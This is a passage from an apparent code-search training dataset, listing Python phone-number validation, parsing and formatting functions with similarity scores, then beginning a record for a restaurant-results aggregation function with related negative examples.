"def validate_phone(phone:str) -> bool:\r\n phone = phone.replace(\"-\", \"\").replace(\"(\", \"\").replace(\")\", \"\")\r\n return phone.isdigit() and len(phone) == 10",
"def fix_crappy_phone_number_formatting(phone_number):\n m = re.match(r'(\\d)?.?(\\d{3})\\D*(\\d{3})\\D*(\\d{4})\\D*(\\d*)$', phone_number)\n if m:\n fixed_number = f'+{m.group(1) or \"1\"}({m.group(2)}){m.group(3)}-{m.group(4)} {\"x\"+m.group(5) if m.group(5) else \"\"}'\n return fixed_number",
"def validate_phonenumber(self):\n special_chars = set(string.punctuation.replace('+', ''))\n for number in self.telefono:\n if number.isalpha() or number in special_chars:\n raise OspiteExc('Il campo numero di telefono non è valido')",
"def validate_phone_number(value):\n\n try:\n z = phonenumbers.parse(value, None)\n except phonenumbers.NumberParseException:\n raise forms.ValidationError(\"Enter a valid phone number.\")\n\n if not phonenumbers.is_valid_number(z):\n raise forms.ValidationError(\"Enter a valid phone number.\")",
"def invalid_phone_number(phonenumber):\n if all(digit.isdigit() for digit in phonenumber) \\\n and len(phonenumber) <= 10 and phonenumber.startswith(\"0\"):\n return False\n return True",
"def test_valid_phone_invalid():\n assert not valid_phone(\"\")\n assert not valid_phone(\"000-000-00000\")\n assert not valid_phone(\"000-0000-0000\")\n assert not valid_phone(\"0000-000-0000\")\n assert not valid_phone(\"00000000000\")\n assert not valid_phone(\"foobar\")",
"def validate_number(val):\n match = re.match('^\\+?[0-9]{7,15}$', val)\n if match is None:\n raise ValidationError(\"Alternate phone number is invalid.\")",
"def strip_non_num(phone):\n return ''.join([i for i in phone if i.isdigit()])",
"def validate_phone(value):\n if value.strip() == \"\":\n return\n try:\n phonenumbers.parse(value, \"US\")\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValidationError(\"Enter a valid phone number.\")",
"def search_by_phone_number(self, phone_number):\r\n if len(re.findall(\"[^0-9-+ ]+\", phone_number)) or len([c for c in phone_number if c == '+']) > 1:\r\n raise PersonPhoneNumberException(\"Invalid phone number search input. Can only contain digits, hyphens,\"\r\n \"spaces, and a plus sign(+).\")\r\n phone_number = phone_number.replace(' ', '')\r\n phone_number = phone_number.replace('-', '')\r\n phone_number = phone_number.replace('+4', '')\r\n return self.__filter(self.get_all_persons(), lambda x: phone_number in x.phone_number.replace(' ', ''))",
"def validate_telephone(self, data):\n value = data.strip()\n if re.match(constant.NUMBER_ONLY, value):\n if User.objects.filter(telephone=value).exists():\n raise serializers.ValidationError('telephone number already registered')\n return value\n raise serializers.ValidationError(VALIDATION['phone']['invalid'])",
"def test_10_phonenumbers_formatting_fr_CH(self):\n number_phone = self.samples[1]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, '+41411234567', 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, '+41 41 123 45 67', 'International phone formatting failed')",
"def parse_phone(s):\n pattern = '''\n ^\\s* # Leading spaces\n (?P<areacode>\n \\d{3}-? # \"xxx\" or \"xxx-\"\n | \\(\\d{3}\\)\\s* # OR \"(xxx) \"\n )\n (?P<prefix>\\d{3}) # xxx\n -? # Dash (optional)\n (?P<suffix>\\d{4}) # xxxx\n \\s*$ # Trailing spaces\n '''\n matcher = re.compile(pattern, re.VERBOSE)\n matches = matcher.match(s)\n if matches is None:\n print(s)\n return s\n else:\n areacode = re.search('\\d{3}', matches.group ('areacode')).group()\n prefix = matches.group ('prefix')\n suffix = matches.group ('suffix')\n return areacode+'-'+prefix+'-'+suffix",
"def validate_phone(self, value):\n pattern = re.compile(r'(^[+0-9]{1,3})*([0-9]{8,15}$)', re.IGNORECASE)\n value = value.replace(\" \", \"\")\n if pattern.match(value) is None:\n raise ValidationError(_('Please insert correct phone number.'))\n return value",
"def grab_area_code(phone_number):\r\n #number of form +1 XXX XXX XXXX (this should be the form get_twilio_client provides)\r\n if \"+1\" == phone_number[:2]:\r\n return phone_number[2:5]\r\n # number of form 1 XXX XXX XXXX\r\n if len(phone_number) == 11 and phone_number[0] == '1':\r\n return phone_number[1:4]\r\n # number of form XXX XXX XXXX\r\n if len(phone_number) == 10:\r\n return phone_number[:3]\r\n raise BadPhoneNumberError('\"%s\" is an invalid phone number.' % phone_number)",
"def parse_telephone(telephone, telephone_re):\n match = re.search(telephone_re, telephone)\n if match:\n return (telephone, False)\n else:\n return (telephone, True)",
"def get_valid_num(cls, phone_number):\n if type(phone_number) != str:\n return None\n elif cls.MAX_NUM_LEN < len(phone_number):\n return None\n else:\n extracted_num = cls.extract_digits(phone_number)\n if len(extracted_num) != cls.NUM_OF_DIGITS:\n return None\n return extracted_num",
"def __init__(self, phone_number):\n self.number = self.clean(phone_number)",
"def extract_digits(cls, phone_number):\n extracted_num = \"\"\n for ch in phone_number:\n if ch in cls.INTEGER_STRING:\n extracted_num += ch\n return extracted_num",
"def test_phone_too_short(self):\n phone = Report(\n contact_phone='202',\n )\n\n try:\n phone.full_clean()\n except ValidationError as err:\n phone_error_message = err.message_dict['contact_phone']\n self.assertTrue(phone_error_message == ['Enter a valid value.'])",
"def check_phone(val: Union[str, int, Any], clean: bool) -> Any:\n val = str(val)\n\n # If the value is null, return empty strings for the components\n # and \"null\" for the \"status\"\n if val in NULL_VALUES:\n return [\"\"] * 5 + [\"null\"] if clean else False\n\n mch = re.match(CA_US_PATTERN, re.sub(r\"''\", r'\"', val))\n # Check if the value was able to be parsed\n if not mch:\n return [\"\"] * 5 + [\"unknown\"] if clean else False\n if mch.group(\"country\") and not mch.group(\"area\"):\n return [\"\"] * 5 + [\"unknown\"] if clean else False\n\n # Components for phone number\n country_code = mch.group(\"country\")\n area_code = mch.group(\"area\")\n office_code = mch.group(\"office\")\n station_code = mch.group(\"station\")\n ext_num = mch.group(\"ext\")\n\n return (\n (country_code, area_code, office_code, station_code, ext_num, \"success\") if clean else True\n )",
"def test_good_phone():\n good_phone = \"213-555-1212\"\n m = CannedRe.PHONE.match(good_phone)\n# print getmembers(m)\n assert m is not None, \"Canned RegEx phone test failed for %s\" % good_phone\n assert m.string == good_phone",
"def testPhoneNumberValidation(self):\n \n fsd_tool = getToolByName(self.portal, TOOLNAME)\n desc = fsd_tool.getPhoneNumberDescription()\n self.failUnless(self.person.validate_officePhone('(555) 555-5555') is None)\n self.failUnless(self.person.validate_officePhone('555 555-5555') == \"Please provide the phone number in the format %s\" % desc)\n \n # Make sure a blank value for the phone number results in no validation\n self.failUnless(self.person.validate_officePhone('') is None, \"A blank value for officePhone should not be validated since officePhone is not a required field.\")\n \n # Make sure a blank value for the regex results in no validation.\n fsd_tool.setPhoneNumberRegex('')\n self.failUnless(self.person.validate_officePhone('555 555-5555') is None, \"A blank value for phoneNumberRegex should result in any value being accepted\")",
"def test_format_phone_none(self):\n number1 = None\n self.assertEqual(format_phone(number1), None)",
"def check_for_duplicate_phone_numbers(d):\n\n print('# This function is under maintenance. Please try again later.')\n return d",
"def phone_number_validator(phone_number):\n if len(phone_number) != 10:\n return False\n if phone_number[0] == '0':\n return False\n try:\n int(phone_number)\n except ValueError:\n return False\n return True",
"def create_phone_number(n):",
"def test_parse_phone(self):\n phone_dict = parse_phone('800-555-1234')\n self.assertTrue(str(phone_dict), \n \"{'area_code': '800', 'exchange': '555', 'number': '1234'}\")",
"def get_phone_numbers(r):\n phone_match = re.findall(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d', r)\n phone_list = []\n if phone_match:\n for match in phone_match:\n if match not in phone_list:\n phone_list.append(match)\n phone_list = set(phone_list)\n return phone_list",
"def is_phonenumber(number):\n\n phonenum = re.compile(r'^(\\d{3})-(\\d{3})-(\\d{4})$')\n if phonenum.match(number) is None:\n return False\n else:\n return True",
"def lookup_phone_number(phone):\n \n #create Twilio client\n client = Client(ACCOUNT_SID, AUTH_TOKEN)\n\n try:\n\n #check if number is real number using Twilio lookup\n phone_number = client.lookups \\\n .phone_numbers(phone) \\\n .fetch(type=['carrier'])\n\n #returns formmatted phone number\n return phone_number.phone_number\n\n #checks Twilio exception responses if number not real\n except TwilioRestException as e:\n\n #Number not found - return False\n if e.code == 20404:\n\n return False\n\n else:\n\n raise e",
"def numbers():\n return '<pre>' + '\\n'.join(phone_numbers) + '</pre>'",
"def parse_phone(parsed_data):\n result = []\n known_values = []\n\n contacts = {'registrant_contact': [], 'administrative_contact': [], 'technical_contact': [],\n 'domain_registrar' :[]}\n if 'registrant_contact' in parsed_data:\n contacts['registrant_contact'].append(parsed_data['registrant_contact'])\n if 'administrative_contact' in parsed_data:\n contacts['administrative_contact'].append(parsed_data['administrative_contact'])\n if 'technical_contact' in parsed_data:\n contacts['technical_contact'].append(parsed_data['technical_contact'])\n if 'domain_registrar' in parsed_data:\n contacts['domain_registrar'].append(parsed_data['domain_registrar'])\n # parsing phone number from contact block\n\n for contact, info in contacts.items():\n if info is not None:\n d = {'type': 4, 'data': '', 'properties': {}, 'special_properties': {}, 'ref': {}}\n # properties dictionary\n owener = {'type': 11, 'owner': ''}\n location = {'type': 11, 'location': ''}\n properties_list = []\n special_properties_list = []\n d.update({'ref': {'task': 'whois', 'whois_for': '', 'whois_from': ''}})\n if 'domain_name' in parsed_data and len(parsed_data['domain_name']) > 0:\n d['ref']['whois_for'] = parsed_data['domain_name']\n if 'whois_server' in parsed_data:\n d['ref']['whois_from'] = parsed_data['whois_server']\n\n for name in info:\n if \"phone_number\" in name:\n if name['phone_number'] in known_values:\n break\n for feature in name.keys():\n if feature == \"phone_number\":\n d['data'] = name['phone_number']\n known_values.append(name['phone_number'])\n if feature == \"full_name\":\n owener['owner'] = name['full_name']\n\n if feature ==\"registrar_name\":\n owener['owner'] = name['registrar_name']\n if feature == \"city_name\":\n location['location'] = name['city_name']\n # prevent from create result if phone number of contact is not available\n if d['data'] == '':\n continue\n properties_list.append(location)\n properties_list.append(owener)\n special_properties_list.append({'phone_type': '', 'type': 0})\n special_properties_list.append({'country_code': '', 'type': 0})\n special_properties_list.append({'operator': '', 'type': 0})\n special_properties_list.append({'is_valid': '', 'type': 0})\n d['special_properties'] = special_properties_list\n d['properties'] = properties_list\n result.append(d)\n return result",
"def phone_parser(phone, mode='PL'):\n\n if not phone:\n raise WrongInput(\"Input cannot be blank\")\n if not isinstance(phone, str):\n raise WrongInput(\"Invalid phone format\")\n\n if mode == 'PL':\n gsm_prefixes = ['50', '51', '53', '57', '60', '66', '69', '72', '73', '78', '79', '88']\n if phone[:2] in gsm_prefixes:\n phone_pattern = re.compile(r'''\n # don't match beginning of string\n (\\d{0,2}) # area code of 2 digits (e.g. '42')\n \\D* # optional separator\n (\\d{3}\\D*\\d{3}\\D*\\d{3}) # rest of number - divide into 3 3-digit sequences with optional separators\n # (e.g. '605-789-567')\n $ # end of string\n ''', re.VERBOSE)\n else:\n phone_pattern = re.compile(r'''\n # don't match beginning of string\n (\\d{0,2}) # area code of 2 digits (e.g. '42')\n \\D* # optional separator\n (\\d{3}\\D*\\d{2}\\D*\\d{2}) # rest of number - divide into 3 2-digit sequences with optional separators\n # (e.g. '605-78-56')\n $ # end of string\n ''', re.VERBOSE)\n else:\n phone_pattern = re.compile(r'''\n # don't match the beginning of the string\n (\\d{3}) # area code of 3 digits (e.g. '800')\n \\D* # optional separator\n (\\d{3}\\D*\\d{4}\\D*\\d+) # rest of number - divide into 3 sequences with optional separators: two obligatory\n # with 3 and 4 digits, one optional with any number of digits\n $ # end of string\n ''', re.VERBOSE)\n if not re.search(phone_pattern, phone):\n raise WrongInput(\"Invalid phone format.\")\n\n phone_obj = phone_pattern.search(phone)\n phone_area, phone_num = phone_obj.groups()\n phone = re.sub(r'\\D', '', phone_num)\n return phone, phone_area, phone_num",
"def test_20_phonenumbers_UnicodeDecodeError(self):\n number_phone = self.samples[2]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)",
"def is_valid_phone(phone):\n assert phone is not None\n phone = str(phone)\n return len(phone) == 10 and is_valid_integer(phone)",
"def validate_phone_number(val):\n if not val.isdigit() or len(val) < 3:\n raise argparse.ArgumentTypeError(\"Invalid phone number\")\n return val",
"def ad_rep_lead_phone(obj):\n if obj.phone_number is None:\n phone_number = ''\n else:\n phone_number = format_phone(obj.phone_number)\n return \"%s\" % phone_number",
"def conform_phonenumber(\n s: str, region: Optional[str] = None\n ) -> Union[Invalid, str]:\n try:\n p = phonenumbers.parse(s, region=region)\n except phonenumbers.NumberParseException:\n return INVALID\n else:\n return phonenumbers.format_number(p, phonenumbers.PhoneNumberFormat.E164)",
"def phone_number():\r\n\r\n x = ''.join(str(_random.randrange(0, 10)) for i in xrange(10))\r\n y = '%s-%s-%s' % (x[0:3], x[3:6], x[6:])\r\n return y",
"def validatePhoneNumber(self):\n ## Declaring a Flag to control a while loop\n phone_number_ok = False\n ## While loop to have user retry their input if they enter incorrectly\n while not phone_number_ok:\n ## Asking for a phone number and checkig to see if it is 10 digits\n if self.phone_number.isdigit():\n if len(self.phone_number) == 10:\n phone_number_ok = True\n return True\n else:\n print(\"Please Enter a 10 digit phone number.\")\n return False\n \n else:\n print(\"You have enetered an invalid phone number. Please try again.\")\n return False",
"def strip_phone_prefix(self, phone_num):\n # FIXME more accurate check\n if phone_num.startswith('+86'):\n return phone_num.replace('+86', '')\n if len(phone_num) != 11:\n return None\n return phone_num",
"def validate_phone_number(phone_number):\n\n check = re.fullmatch(r\"^07\\d{8}\", phone_number)\n\n if check:\n return True\n else:\n return False",
"def mobile_validator(mobile):\n if mobile[0:4] != '+989':\n raise ValidationError('Invalid mobile')",
"def validatephone(self, send_to):\n\n self.send_to = send_to.lstrip('+')\n self.params = {\n 'api_key': self.phone_validate_api_key,\n 'phone' : self.send_to\n }\n response = requests.get(self.phone_validate_api_url,params=self.params)\n decoded_content = json.loads(response.content.decode('UTF-8'))\n is_phonenumber_valid = decoded_content['valid']\n\n return is_phonenumber_valid",
"def validate_mobile(self, mobile):\n self.mobile = mobile.strip()\n example = \"mobile number (ex. +2346787646)\"\n if re.match(r'(^[+0-9]{1,3})*([0-9]{10,11}$)',\n self.mobile) is None:\n raise GraphQLError(\n ERROR_RESPONSES[\"invalid_field_error\"].format(example))\n return self.mobile",
"def func2():\n\n\tnums = '''\n\t\t800-555-1212\n\t\t800 555 1212\n\t\t800.555.1212\n\t\t(800) 555-1212\n\t\t1-800-555-1212\n\t\t800-555-1212-1234\n\t\t800-555-1212x1234\n\t\t800-555-1212 ext. 1234\n\t\twork 1-(800) 555.1212 #1234\n\t'''\n\n\tpattern = r\"(\\d{3})\\D*(\\d{3})\\D*(\\d{4})\\D*(\\d*)$\"\n\tregex = re.compile(pattern)\n\n\tprint regex.search(\"800-555-1212\").groups()\n\tprint regex.search(\"800 555 1212\").groups()\n\tprint regex.search(\"800.555.1212\").groups()\n\n\tprint regex.search(\"(800) 555-1212\").groups()\n\tprint regex.search(\"1-800-555-1212\").groups()\n\n\tprint regex.search(\"800-555-1212-1234\").groups()\n\tprint regex.search(\"800-555-1212x1234\").groups()\n\n\tprint regex.search(\"800-555-1212 ext. 1234\").groups()\n\tprint regex.search(\"work 1-(800) 555.1212 #1234\").groups()",
"def scrape_phones(webpage):\n phones = []\n html = requests.get(webpage)\n phone_regex = re.compile(r'\\(?\\d{3}\\)?[-.\\s]\\d{3}[-.\\s]\\d{4}')\n phones = phone_regex.findall(html.text)\n return phones",
"def phone_numbers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TelephonyPhoneNumbersArgs']]]]:\n return pulumi.get(self, \"phone_numbers\")",
"def ldap_get_number(self, user):\n result = super(Auth42, self)._search_not_empty(user)\n if result is not None:\n number = result.get(\"mobile-phone\")[0]\n return number\n\n return None",
"def validate_phone_number(value, country_code='VN'):\n msg = _('Invalid phone number format.')\n try:\n phone = phonenumbers.parse(value, country_code)\n except:\n raise ValidationError(msg)\n if not phonenumbers.is_valid_number_for_region(phone, country_code):\n raise ValidationError(msg)\n return value",
"def _check_address(self):\n for object_ in self.objects:\n if object_.object_name.endswith(' ЕС'):\n if object_.object_address[:6].isnumeric():\n object_.object_address = \\\n object_.object_address[:7] + \\\n object_.object_fed_subj + ', ' + \\\n object_.object_address[7:]",
"def strip(phone):\n return re.sub('\\D', '', Phone.normalize(phone))",
"def valid_phone(phone_number):\n return bool(re.match(r\"^\\+?\\d{10,15}$\", phone_number))",
"def number(self, new_phone):\n returned_num = self.get_valid_num(new_phone)\n if returned_num is None:\n raise ValueError\n self._phone = returned_num",
"def check_as_htk_phone(phone):\n try:\n phone = str(phone)\n except UnicodeEncodeError:\n return False\n\n # Must not contain spaces\n phone_copy = phone.strip()\n if len(phone_copy) != len(phone):\n return False\n\n # Must contain characters!\n if len(phone) == 0:\n return False\n\n # Must not start by minus or plus\n if phone[0] in ['-', '+']:\n return False\n\n # Must not start by a digit\n try:\n int(phone[0])\n except ValueError:\n return False\n\n return True",
"def test_get_a_common_area_phone(self):\n pass",
"def phone_number(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"phone_number\")",
"def phone_number(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"phone_number\")",
"def remove_phone(body):\r\n phone = re.compile('[0-9]{7}|[0-9]{3}[\\- ][0-9]{3}[\\- ][0-9]{4}|[0-9]{10}|\\([0-9]{3}\\)[\\- ][0-9]{3}[\\- ][0-9]{4}')\r\n body = re.sub(phone, 'phone', body)\r\n return body",
"def save(self, *args, **kwargs):\n if self.phone is not None and self.phone.strip() == \"\":\n self.phone = None\n if self.phone is not None:\n try:\n phone_number = phonenumbers.parse(self.phone, \"US\")\n self.phone = phonenumbers.format_number(\n phone_number, phonenumbers.PhoneNumberFormat.E164\n )\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValidationError(\"Invalid phone number (this should have been caught already)\")\n super().save(*args, **kwargs)",
"def validate(number):\n number = compact(number)\n if len(number) != 10:\n raise InvalidLength()\n if not _nipt_re.match(number):\n raise InvalidFormat()\n return number",
"def get_phone(self, node, *, area_codes=[], error=True):\n\n if isinstance(node, etree._ElementUnicodeResult):\n match = re.search(\n r\"(?:\\A|\\D)(\\(?\\d{3}\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\", node\n )\n if match:\n return match.group(1)\n match = node.xpath('.//a[contains(@href,\"tel:\")]')\n if match:\n return match[0].attrib[\"href\"].replace(\"tel:\", \"\")\n if area_codes:\n for area_code in area_codes:\n match = re.search(\n r\"(?:\\A|\\D)(\\(?%d\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\" % area_code,\n node.text_content(),\n )\n if match:\n return match.group(1)\n else:\n match = re.search(\n r\"(?:\\A|\\D)(\\(?\\d{3}\\)?\\D?\\d{3}\\D?\\d{4}(?:\\s*(?:/|x|ext[.:]?|poste)[\\s-]?\\d+)?)(?:\\D|\\Z)\",\n node.text_content(),\n )\n if match:\n return match.group(1)\n if error:\n raise Exception(\"No phone pattern in {}\".format(node.text_content()))",
"def _remove_area_code(phone):\n\n if not phone.startswith('+46'):\n return phone\n else:\n return '0' + phone[3:]",
"def __ui_search_persons_by_phone_number(self):\n searched_phone_number = input(\"Introduce the phone number: \").strip().lower()\n if searched_phone_number == \"\":\n print(\"You cannot search persons by an empty phone number!\\n\")\n return\n\n searched_persons = self.__person_service.find_persons_by_phone_number(searched_phone_number)\n\n if len(searched_persons) == 0:\n print('There is no person whose phone number matches with \"{}\"!\\n'.format(searched_phone_number))\n else:\n print(\"\")\n for person in searched_persons:\n print(person)\n print(\"\")",
"def phoneDisplay(number):\n return number[0:3] + \" · \" + number[3:6] + \" · \" + number[6:10]"
] | [
"0.7204492",
"0.7189207",
"0.7125823",
"0.70673645",
"0.69369113",
"0.6922547",
"0.6824679",
"0.67972773",
"0.67830795",
"0.6771247",
"0.6759565",
"0.67235404",
"0.6691779",
"0.6690462",
"0.6681887",
"0.66814655",
"0.66740984",
"0.66468287",
"0.6635932",
"0.66335326",
"0.66268545",
"0.6614862",
"0.6589962",
"0.65839165",
"0.65721256",
"0.65580755",
"0.65546733",
"0.6552491",
"0.6533407",
"0.6518238",
"0.6516523",
"0.64995694",
"0.6493341",
"0.64178836",
"0.6393487",
"0.6392253",
"0.63798",
"0.63717294",
"0.6369214",
"0.6341162",
"0.6326811",
"0.6304788",
"0.6279889",
"0.62758476",
"0.6270565",
"0.62286705",
"0.6218895",
"0.6188276",
"0.618793",
"0.61840534",
"0.61832607",
"0.6139855",
"0.6125955",
"0.61172587",
"0.6111878",
"0.6108497",
"0.61048627",
"0.6081274",
"0.6070585",
"0.60528684",
"0.6048306",
"0.6033699",
"0.6032198",
"0.60298634",
"0.60211885",
"0.601841",
"0.6014427",
"0.6003208",
"0.60029054",
"0.6001315",
"0.599791",
"0.59876007",
"0.59806854",
"0.59644735",
"0.5949263",
"0.5932635",
"0.5932278",
"0.5903673",
"0.5897627",
"0.588323",
"0.58508646",
"0.5847529",
"0.5840725",
"0.58399045",
"0.5834058",
"0.58328503",
"0.583146",
"0.5828163",
"0.5825008",
"0.5782546",
"0.57689595",
"0.5768302",
"0.5768302",
"0.57517934",
"0.5732142",
"0.5723155",
"0.57143414",
"0.5710147",
"0.5704943",
"0.5700161"
] | 0.6447618 | 33 |
iterate through each restaurant name from restaurant names and aggregate to results | def results_aggregator(self, names):
for name in names:
result = self.main(name)
self.results.append(result)
print("'%s' has been written to the file." % result[0])
"""result is formatted name, number, rating, review count""" | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resolveResult(self, restaurants):\n restaurant_list = []\n for restaurant in restaurants:\n restaurant_list.append({'Name': restaurant['restaurant']['name'], \"cuisines\": [x.strip() for x in restaurant['restaurant']['cuisines'].split(',')],\n \"lat\": restaurant['restaurant']['location']['latitude'], \"long\": restaurant['restaurant']['location']['longitude'], \"highlights\": restaurant['restaurant']['highlights'], \"Thumb\": restaurant['restaurant']['thumb'],\n \"user_Rating\": restaurant['restaurant']['user_rating']['aggregate_rating'],\"phone_Numbers\": restaurant['restaurant']['phone_numbers']})\n cuisineDict = { \"Chinese\":1, \"Korean\":2,\"Australia\":3,\"Japanese\":4,}\n WordDict = {1: \"cozy\",2: \"tasty\",3:'amazing',4:'flavorful',5:'yummy'}\n for i in range(len(restaurant_list)):\n icon = 5\n cuisines = restaurant_list[i][\"cuisines\"]\n adjective = WordDict[random.randint(1,5)]\n comment = \"This is a \"+ adjective\n if cuisines:\n if \"Chinese\" in cuisines:\n icon = 1\n elif \"Korean\" in cuisines:\n icon = 2\n elif \"Australia\" in cuisines:\n icon = 3\n elif \"Japanese\" in cuisines:\n icon = 4\n else:\n icon = 5\n comment = comment + \" \" + cuisines[0]\n restaurant_list[i]['icon'] = icon\n comment = comment + \" restaurant\"\n restaurant_list[i]['comment'] = comment\n res = {\"restaurants\":restaurant_list }\n return res",
"def processResults(results):\n restaurantDict = {}\n for result in results:\n rdict = {}\n name = result['name']\n location = result['location']\n rdict['name'] = name\n rdict['url'] = result['mobile_url']\n rdict['cuisine'] = result['categories']\n rdict['closed'] = result['is_closed']\n rdict['address'] = location['display_address'][0]\n if 'neighborhoods' in location:\n rdict['neighborhood'] = location['neighborhoods'][0]\n else:\n rdict['neighborhood'] = 'N/A'\n if 'display_phone' in result:\n rdict['phone'] = result['display_phone']\n rdict['city'] = str(location['city']) + \", \" + str(location['state_code'])\n rdict['rating'] = str(result['rating'])\n if ('coordinate' in result['location']):\n rdict['coords'] = [result['location']['coordinate']['latitude'], result['location']['coordinate']['longitude']]\n if rdict['city'] != rdict['address']:\n restaurantDict[name] = rdict\n\n return restaurantDict",
"def getRestaurantAddresses(restaurants):\n addresslist = []\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addresslist.append(addressstring)\n\n # pprint.pprint(addresslist)\n return addresslist",
"def calcRestaurantList2(latlngs, cuisines, distance):\n restlist = []\n used = []\n cuisine = str(cuisines[0])\n if len(cuisines) > 1:\n cuisine = \",\".join(cuisines)\n minrating = 5.0\n worst = ''\n ratings = []\n for point in latlngs:\n yelpresults = search2(cuisine,point,distance)['businesses']\n processedyelpresults = processResults(yelpresults)\n for result in processedyelpresults:\n if (result not in used):\n if len(restlist) < 40:\n restlist.append(processedyelpresults[result])\n used.append(result)\n ratings.append(float(processedyelpresults[result]['rating']))\n if float(processedyelpresults[result]['rating']) < minrating:\n minrating = float(processedyelpresults[result]['rating'])\n worst = result\n # print (\"The worst restaurant is {0}\".format(worst))\n elif len(restlist) >= 40:\n ratings.sort()\n minrating = ratings[0]\n if float(processedyelpresults[result]['rating']) > ratings[0]:\n if worst in restlist:\n ratings.remove(minrating)\n restlist.remove(restlist.index(worst))\n # print (\"Removed {0}, which had a rating of {1}. It was in restlist\".format(worst, minrating))\n if len(restlist) <= 45:\n restlist.append(processedyelpresults[result])\n # print (\"Added {0}, which had a rating of {1}\".format(result, processedyelpresults[result]['rating']))\n else:\n minrating = float(ratings[0])\n # print (\"The minimum rating for a restaurant is {0}\".format(minrating))\n for r in restlist:\n # print (r)\n if float(r['rating']) == minrating:\n restlist.remove(r)\n # print (\"Removed {0}, which had a rating of {1}. Matched on minrating\".format(r, minrating))\n if minrating in ratings:\n ratings.remove(minrating)\n if len(restlist) <= 45:\n restlist.append(processedyelpresults[result])\n # print (\"Added {0}, which had a rating of {1}\".format(result, processedyelpresults[result]['rating']))\n\n # pprint.pprint(restlist)\n # print(used)\n\n return restlist",
"def getRestaurantAddressDict(restaurants):\n addressdict = {}\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addressdict[addressstring] = rest['name']\n\n return addressdict",
"def analyse(self):\n self.__gather_tagged_reviews(self._restaurants)",
"def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"",
"def process(data):\n # words to scrub from data\n strip_words = [\n 'avenue',\n 'ave',\n 'street',\n 'boulevard',\n 'blvd',\n 'st',\n 'road',\n 'rd',\n 'court',\n 'ct',\n 'guest',\n 'guests',\n 'family',\n 'spouse',\n 'spouses'\n ]\n # quick and dirty translator for scrubbing punctuation from data\n translator = str.maketrans({key: None for key in string.punctuation})\n for i in range(len(data)):\n indx, name, addr = data[i] # ,zipc,twn,apt\n\n # scrub the data and normalize to lowercase\n name = name.translate(translator)\n addr = addr.translate(translator)\n name = name.lower()\n addr = addr.lower()\n name = replace_all(name, strip_words)\n addr = replace_all(addr, strip_words)\n\n # identify similar entries from the remainder of the data\n matches = []\n for j in range(i + 1, len(data)):\n\n # scrub the data\n n_indx, n_name, n_addr = data[j] # ,n_zipc,n_twn,n_apt\n n_name = n_name.translate(translator)\n n_addr = n_addr.translate(translator)\n n_name = n_name.lower()\n n_addr = n_addr.lower()\n n_name = replace_all(n_name, strip_words)\n n_addr = replace_all(n_addr, strip_words)\n # print(addr, n_addr)\n\n # check for similarity\n # TODO: should a report be made if only one of these is similar?\n if sim(name, n_name) and sim(addr, n_addr):\n matches.append(data[j])\n\n # report the matches found\n if len(matches) > 0:\n tmp = \"%d: %s, %s\"\n s1 = tmp % tuple(data[i])\n s2 = \"*\" * 15\n print(s1)\n print(s2)\n for m in matches:\n print(tmp % tuple(m))\n print(\"\\n\")",
"def summarize_food_data(unprocessed_food_list: List[str]) -> List[Dict[str, str]]:\n summary: List[Dict[str, str]] = []\n item_count_data: Dict[str, int] = {}\n\n for item in unprocessed_food_list:\n if item not in item_count_data:\n item_count_data[item] = 1\n else:\n item_count_data[item] += 1\n \n for product in item_count_data:\n item_information: Dict[str, str] = {}\n item_information[\"name\"] = product\n item_information[\"quantity\"] = str(item_count_data[product])\n item_information[\"units\"] = \"-\"\n summary.append(item_information)\n \n return summary",
"def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants",
"def results():\n\n queryName = request.form['query']\n queryStars = request.form['stars']\n \n datasource = DataSource()\n listOfRestaurantNames = datasource.searchRestaurantsByNameAndMinimumStars(queryName, queryStars)\n restaurants = datasource.generateRestaurantObjects(listOfRestaurantNames[:15])\n\n return render_template('results.html', restaurants=restaurants)",
"def name_totals(name_object,name):\r\n total_names = {}\r\n total_names[name] = sum(name_object['pops'].values())\r\n return total_names",
"def collect_data(self, data: Restaurant) -> Restaurant:\n return data",
"def restaurants_all() -> str:\n restaurant_objects = restaurants.load_restaurants()\n return jsonify(restaurant_objects)",
"def collect_data(self, data: Restaurant) -> Restaurant:\n print('-' * 40)\n print(f'{data.name} | {data.pnr}')\n params = {\n 'produ': data.pnr,\n 'country': 'dk',\n 'token': FilterXMLConfig.cvrapi_api_key()\n }\n headers = {\n 'User-Agent': 'sw814f21 - FindSmiley app - Jonas Andersen'\n }\n\n res = get(self.URL, params=params, headers=headers)\n content = json.loads(res.content.decode('utf-8'))\n\n if res.status_code == 200:\n for appender in self.appenders:\n data = appender(content, data)\n else:\n print(f'Skipping restaurant with p-nr {data.pnr}: record not found remotely')\n\n return super().collect_data(data)",
